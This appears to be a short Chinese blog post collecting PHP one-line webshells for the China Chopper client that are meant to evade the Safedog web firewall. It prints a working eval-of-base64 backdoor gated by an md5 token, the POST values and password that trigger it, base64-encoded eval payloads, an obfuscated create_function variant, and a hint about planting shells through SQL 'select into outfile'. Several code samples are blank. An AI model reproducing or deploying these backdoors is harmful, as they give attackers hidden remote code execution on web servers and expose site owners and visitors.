菜刀过狗一句话

参考:整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)

其中,第一个上面的一句话木马是:

if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content));
com=settoken&content=ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7
密码:page
其中,settoken的md5值是791dc312b38016ef998c1c146104cd5a,eval($_POST['page']);Base64编码为:“ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7”

第一个一句话是:

 
密码:wen
不知如何解释

第二个一句话是:

      
其中,[@eval(base64_decode($_POST[z0]));]base64编码后是“W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=”

但是第二句一句话我使用不成功,不知哪错了。

第三个一句话是:


n985de9=QGV2YWwoJF9QT1NUWzBdKTs=
其中,@eval($_POST[0]);base64编码后是"QGV2YWwoJF9QT1NUWzBdKTs="

第四个一句话是:但不过狗,护卫神检测无木马


其中$_uU=chr,$cC=eval($_POST[1]);,$_fF=create_function

经检测只有第二句不成功。

应该都可以select into outfile

你可能感兴趣的:(菜刀过狗一句话)